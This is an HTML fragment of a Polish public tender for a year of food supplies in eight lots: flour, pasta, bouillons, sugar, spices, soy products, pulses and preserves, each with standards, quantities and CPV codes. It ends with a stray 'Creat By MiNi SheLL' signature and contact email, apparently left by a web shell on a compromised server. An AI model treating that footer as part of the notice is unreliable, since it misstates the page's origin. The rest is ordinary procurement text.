<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły zbożowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.Nazwa artykułu		Norma	ZK1	ZK2-OZ	Razem
1.Mąka pszenna typu 500:
- opakowanie - 1 kg - 25 kg;
- termin przydatności - nie mniej niż 4 m-cy;
- barwa - biała z odcieniem żółtym;
- smak i zapach - swoisty;
- bez obecności szkodników zbożowo - mącznych i innych pozostałości	PN-A-74022	7 000 kg	4780 kg	11780 kg
2. Mąka ziemniaczana:
- opakowania - do 1 kg;
- zapach i smak - typowy dla skrobi ziemniaczanej;
- postać i barwa - biały proszek;  PN-A-74710	30 kg	___	30 kg
3.Makaron:
- typu świderki, muszelki, itp.;
- opakowanie - 1 kg - 25 kg; PN-A-74131	7 000 kg	1360 kg	8360 kg
4.Makaron:
- typu nitki
- opakowanie - 1 kg - 25 kg;  PN-A-74131	____	1300 kg	1300 kg
5.Kasza jęczmienna:
- opakowanie - 1 kg - 25 kg; PN-887A-7403	2 000 kg	1850 kg	3850 kg
6.Kasza manna:
- opakowanie - 0,5 kg - 25 kg;
- zapach i smak - typowy dla kaszy mannej;
- bez obecności szkodników i innych pozostałości; PN-88/A-74203	2 000 kg	
650 kg	2650 kg
7.Ryż biały:
- opakowanie - 1 kg - 25 kg; PN-A-74220	7 000 kg	1520 kg  8520 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.21.00-2, 15.62.30.00-1, 15.85.11.00-2, 15.61.31.00-8, 15.61.41.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Buliony.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.Nazwa artykułu	Norma	ZK1	ZK2 -OZ	Razem
1.Rosół jarzynowy w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;PN-A-75980:1997    1 500 kg	____	1 500 kg
2.Rosół drobiowy w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-A-97052	
1 000 kg	____	1000 kg
3.Rosół grzybowy w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy  PN-A-94050	10 kg ____	10 kg
4.Barszcz biały w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy PN-A-94050:1996 200 kg	____	200 kg
5.Żurek w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy PN-A-94050	
200 kg	320 kg	520 kg
6.Zupa pieczarkowa w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy PN-A-94050	____ 68 kg	68 kg
7.Przyprawa jarzynka w proszku:
- opakowanie - 1 kg - 10 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy PN-A-94050	______  1190 kg	1190 kg
8.Przyprawa do zup w płynie - maggi:
- opakowanie - 1 l - 5 l;
- termin przydatności do spożycia - 6 m-cy od daty dostawy PN-A-94052	
2 000 l	640 l	2640 l
9.Bulion z kury w proszku
- opakowania od 5 - 35 kg 
-  termin przydatności do spożycia - 
6 m-cy od daty dostawy	PN-A-94052:1996	____	1620 kg	1620 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.20.00-7, 15.89.15.00-5, 15.89.14.00-4, 15.89.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Cukier.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.Nazwa artykułu		Norma	ZK1	ZK2-OZ	Razem
1.Cukier biały kryształ:
- opakowanie max. do 25 kg	PN-A-74850	3 000 kg	4700 kg	7700 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.12.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Różne artykuły spożywcze i przyprawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.Nazwa artykułu	Norma	ZK1	  ZK2-OZ	Razem
1.Cukier waniliowy:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; BN-79-8133-01  50 kg	___	50 kg
2.Chrupki kukurydziane:
-opakowanie od 0,08 kg do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;PN-A-88036:1998 200 kg	___	200 kg
3.Curry w proszku:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-R-87022	40 kg 3 kg	43 kg
4.Biszkopty:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-A-88115:1998 250 kg	___	250 kg
5.Budyń:
- smak - różne smaki;
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-A-94051	200 kg ------	200 kg
6.Czosnek granulowany:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-A-86967	30 kg 6 kg	36 kg
7.Galaretka niskosłodzona:
- smak - różne smaki;
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-94/A-75104   100 kg	____	100 kg
8.Herbata granulowana:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-ISO 3720	800 kg  330 kg	1130 kg
9.Kawa zbożowa:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-A-94013	
1 700 kg	580 kg	2280 kg
10.Kisiel:
- smak - różne smaki;
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-A-94051	200 kg  120 kg	320 kg
11.Kwasek cytrynowy:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;
PN-81/A-79734	50 kg	24 kg	74 kg
12.Liść laurowy:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-R-87022	
40 kg	24 kg	64 kg
13.Majeranek:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-A-86958	
40 kg	35 kg	75 kg
14.Majonez:
- opakowanie - wiaderka do 5 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;PN-A-86950:1995 900 kg	_____	900 kg

15.Musztarda;
- opakowanie - wiaderka do 5 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;PN-A-86964	1 000 kg	153 kg	1153 kg
16.Ocet 10% 0,5 l	PN-72/A-79733	600 l	236 l	836 l
17.Papryka mielona ostra:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;  PN-A-86955	
40 kg	47 kg	87 kg
18.Papryka mielona słodka:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-A-86955	______	47 kg	47 kg
19.Pieprz czarny mielony:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-A-86965	120 kg	59 kg	179 kg
20.Proszek do pieczenia:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;PN-A-94017:1998	20 kg	____	20 kg
21.Sól kuchenna:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;PN-C-84081	
3 000 kg	1250 kg	4250 kg
22.Ziele angielskie:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; BN-67/8132-14 40 kg	24 kg	64 kg
23.Bazylia suszona:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;BN-67/8132-14	___	4 kg	4 kg
24.Chili w proszku:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy  PN-A-86955	___   3 kg	3 kg
25.Cynamon w proszku:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy; PN-A-86955	_____	1 kg	1 kg
26.Kminek:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;BN-67/8132-14	___	5 kg	5 kg
27.Oregano suszone:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;BN-67/8132-14	____	5 kg	5 kg
28.Przyprawa do mięsa mielonego:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;BN-67/8132-14	____	7 kg	7 kg
29.Zioła prowansalskie suszone:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;BN-67/8132-14	____	2 kg	2 kg

30.Żelatyna spożywcza:
- opakowanie - do 1 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;PN-A-82245:1993	
50 kg	____	50 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.10.00-2, 15.61.33.11-1, 15.87.12.00-6, 15.88.20.00-4, 15.62.00.00-0, 15.87.10.00-4, 15.83.31.00-7, 15.86.30.00-5, 15.86.10.00-1, 15.62.00.00-0, 15.89.00.00-3, 15.87.10.00-4, 15.87.20.00-1, 15.87.12.73-8, 15.87.12.50-1, 15.87.11.20-1, 15.87.10.00-4, 15.87.21.00-2, 15.89.90.00-6, 15.87.24.00-5, 15.87.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Produkty sojowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.Nazwa artykułu	Norma	ZK1	ZK2-OZ	Razem
1.Granulat sojowy:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;PN-ISO 5506	
600 kg	100 kg	700 kg
2.Kotlety sojowe:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;PN-ISO 5506	
____	94 kg	94 kg
3.Kostka sojowa:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;PN-ISO 5506	
500 kg	100 kg	600 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Produkty strączkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.Nazwa artykułu	Norma	ZK 1	ZK2-OZ	Razem
1.Fasola JAŚ średni;
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;PN-75/R-65031	2 500 kg	1445 kg	3945 kg
2.Groch łuskany:
- opakowanie - 1 kg - 25 kg;
- termin przydatności do spożycia - 6 m-cy od daty dostawy;PN-A-74220:1997	
2 000 kg	800 kg	2800 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.30-7, 15.31.11.33-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przetwory warzywne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.Nazwa artykułu	Norma	ZK1	ZK2	Razem
1.Chrzan tarty:
- opakowanie jednostkowe- słoiki do 0,9 l
- termin przydatności do spożycia min. 12 miesięcy od dostawy; 	PN/R-75520	50 kg	105 kg	155 kg
2.Fasolka konserwowa:
- op.2500- 3000 ml, długość ok. 5 cm, kolor zielony, bez łyka, zalewa klarowna;
- termin przydatności do spożycia min. 12 miesięcy od dostawy; 		PN-V-74016:2001	200 kg	___	200 kg
3.	Groszek konserwowy:
- op. 2500-3500 ml, kolor zielony, soczysty, ziarna całe, nie zepsute, bez obcych zapachów;
- termin przydatności do spożycia min. 12 miesięcy od dostawy; 	PN-76/A-77803 900 kg	485 kg	1385 kg
4.Koncentrat pomidorowy 30%:
- opakowanie - puszka 4500g;
- termin przydatności do spożycia min. 12 miesięcy od dostawy; 	PN-75/A-77601	
3 000 kg	1790 kg	4790 kg
5.Kukurydza konserwowa:
- op. 2500-3000 ml, ziarna młodej kukurydzy luzem w zalewie konserwującej, ziarna całe nieuszkodzone, zalewa barwy żółtawej i żółta, opalizująca lub mętna z osadem tkanki roślinnej na dnie opakowania, konsystencja miękka - wyrównana, smak i zapach - charakterystyczny dla kukurydzy bez obcych smaków i zapachów;
- termin przydatności do spożycia min. 12 miesięcy od dostawy; 	
	PN-A-77807	600 kg	120 kg	720 kg
6.Leczo pieczarkowe:
- produkt spożywczy otrzymany ze świeżych warzyw i grubo pokrojonych pieczarek z dodatkiem soli kuchennej, utrwalony przez pasteryzację;
- konsystencja - półpłynna do gęstej, z widocznymi kawałkami warzyw i pieczarek;
- termin przydatności do spożycia min. 12 miesięcy od dostawy; 	PN-A-86951:2006	1 500 kg	1075 kg	2575 kg
7.Papryka czerwona mrożona:
- op. do 5 kg
- termin przydatności do spożycia min. 12 miesięcy od dostawy;
PN-A-94001:1999P____	472 kg	472 kg
8.Ogórki konserwowe całe:
- op.2500-4000 ml, termin przydatności do spożycia min. 12 miesięcy, produkt spożywczy otrzymany ze świeżych ogórków, przypraw aromatyczno - smakowych, zalanych zalewą octową z dodatkiem soli i cukru, utrwalony przez pasteryzację w opakowaniu hermetycznie zamkniętym, struktura - dość luźno ułożone całe ogórki, jędrne, chrupkie, powierzchnia ogórków wolna od uszkodzeń mechanicznych i plam chorobowych; PN-A-77801 	400 kg	___	400 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.14.00-1, 15.33.14.64-7, 15.33.14.62-3, 15.33.14.27-6, 15.33.14.70-2, 15.33.11.35-2, 15.33.11.70-9, 15.33.15.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Przetwory owocowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.Nazwa artykułu	Norma	ZK1	ZK2-OZ	Razem
1.Dżem:
- opakawania jednostkowych 25g;
- różne smaki;
- termin przydatności do spożycia nie krótszy niż 6 m-cy od daty dostawy;	
	PN-A-75100	10 kg	127 kg	137 kg
2.Miód:
- opakawania jednostkowych 25g;
- różne smaki;
- termin przydatności do spożycia nie krótszy niż 6 m-cy od daty dostawy;  PN-88/A77626	20 kg	400 kg	420 kg
3.Dżem:
- w opakowaniach jednostkowych do 15 kg,
- różne smaki;
- termin przydatności do spożycia nie krótszy niż 6 m-cy od daty dostawy; PN-A-75100	4 000 kg	755 kg	4755 kg
4.Marmolada:
- w opakowaniach jednostkowych do 15 kg,
- różne smaki;
- termin przydatności do spożycia nie krótszy niż 6 m-cy od daty dostawy;	PN-93/A-75103   4 000 kg	1080 kg	5080 kg
5.Kompot truskawkowy:
- słoik o pojemności 0,900 l - 1 l, wygląd -widoczne całe owoce, zalewa klarowna, ekstrakt ogólny nie mniej niż 20 %, smak i zapach smak słodki, charakterystyczny dla kompotu truskawkowego, minimalny termin przydatności do spożycia od dnia dostawy 6 miesięcy; PN-75/A-75953	800 l	____	800 l
6.Mieszanka owocowa mrożona:
- op. do 5 kg
- termin przydatności do spożycia min. 12 miesięcy od dostawy;PN-A-78652:1997/:A z 1:2002	____	395 kg	395 kg
7.Dżem truskawkowy
- w opakowaniach jednostkowych do 15 kg,
- termin przydatności do spożycia nie krótszy niż 6 m-cy od daty dostawy;PN-A-75100	____	650 kg	650 kg
8.Kompot śliwkowy:
- słoik o pojemności 0,900 l - 1 l, wygląd widoczne całe owoce, zalewa klarowna, ekstrakt ogólny nie mniej niż 20 %, smak i zapach smak słodki, charakterystyczny dla kompotu śliwkowego, minimalny termin przydatności do spożycia od dnia dostawy 6 miesięcy; PN-75/A-75953	200 l	___	200 l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.22.90-3, 15.83.16.00-8, 15.33.22.30-5, 15.33.21.00-5, 15.33.11.00-8, 15.33.22.90-3, 15.33.21.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com